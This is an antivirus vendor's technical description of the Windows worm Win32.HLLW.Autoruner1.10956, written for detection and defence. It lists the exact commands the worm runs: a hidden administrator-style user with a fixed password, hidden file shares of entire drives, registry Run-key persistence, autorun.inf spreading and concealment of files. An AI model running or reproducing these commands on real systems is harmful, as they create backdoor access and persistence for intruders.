マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Win32.HLLW.Autoruner1.10956

Added to the Dr.Web virus database: 2012-01-13

Virus description added:

Technical Information

To ensure autorun and distribution:
Modifies the following registry keys:
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Microsoft' = 'C:\Program File\Microsoft\MicrosoftSafety.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft' = 'C:\Program File\Microsoft\MicrosoftSafety.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft' = ' C:\Program File\Microsoft\MicrosoftSafety.exe'
Creates the following files on removable media:
  • <Drive name for removable media>:\autorun.inf
  • <Drive name for removable media>:\C0MM\C0MM\svchost.exe
Malicious functions:
To complicate detection of its presence in the operating system,
forces the system hide from view:
  • hidden files
  • file extensions
Executes the following:
  • <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  • <SYSTEM32>\net1.exe users /add SYS_4321 passPass
  • <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  • <SYSTEM32>\attrib.exe +s +h +r E:\autorun.inf
  • <SYSTEM32>\reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
  • <SYSTEM32>\reg.exe add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
  • <SYSTEM32>\net1.exe users SYS_4321 passPass
  • <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
  • <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
  • <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
  • <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " C:\Program File\Microsoft\MicrosoftSafety.exe" /f
  • <SYSTEM32>\reg.exe DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
  • <SYSTEM32>\net1.exe localgroup %USERNAME%s /add SYS_4321
  • <SYSTEM32>\attrib.exe +s +H "C:\Program File"
  • <SYSTEM32>\attrib.exe +s +H "C:\Program File\Microsoft"
  • <SYSTEM32>\attrib.exe +s +H C:\C0MM
  • <SYSTEM32>\attrib.exe +s +H "<Current directory>\<Virus name>"
  • <SYSTEM32>\tskill.exe taskmagr
  • <SYSTEM32>\net1.exe share SYS_C$=C:\
  • <SYSTEM32>\attrib.exe +s +H C:\C0MM\C0MM
  • <SYSTEM32>\attrib.exe +s +H E:\C0MM
  • <SYSTEM32>\attrib.exe +s +H E:\C0MM\C0MM
  • <SYSTEM32>\attrib.exe -r -a E:\autorun.inf
  • <SYSTEM32>\attrib.exe -r -a C:\autorun.inf
  • <SYSTEM32>\attrib.exe +s +h +r C:\autorun.inf
  • <SYSTEM32>\net1.exe share SYS_E$=E:\
Modifies file system :
Creates the following files:
  • C:\C0MM\C0MM\svchost.exe
  • C:\autorun.inf
  • C:\Program File\Microsoft\MicrosoftSafety.exe
Sets the 'hidden' attribute to the following files:
  • <Drive name for removable media>:\autorun.inf
  • C:\autorun.inf
Miscellaneous:
Searches for the following windows:
  • ClassName: 'Indicator' WindowName: ''
  • ClassName: '' WindowName: ''
  • ClassName: '' WindowName: 'af32d3b0'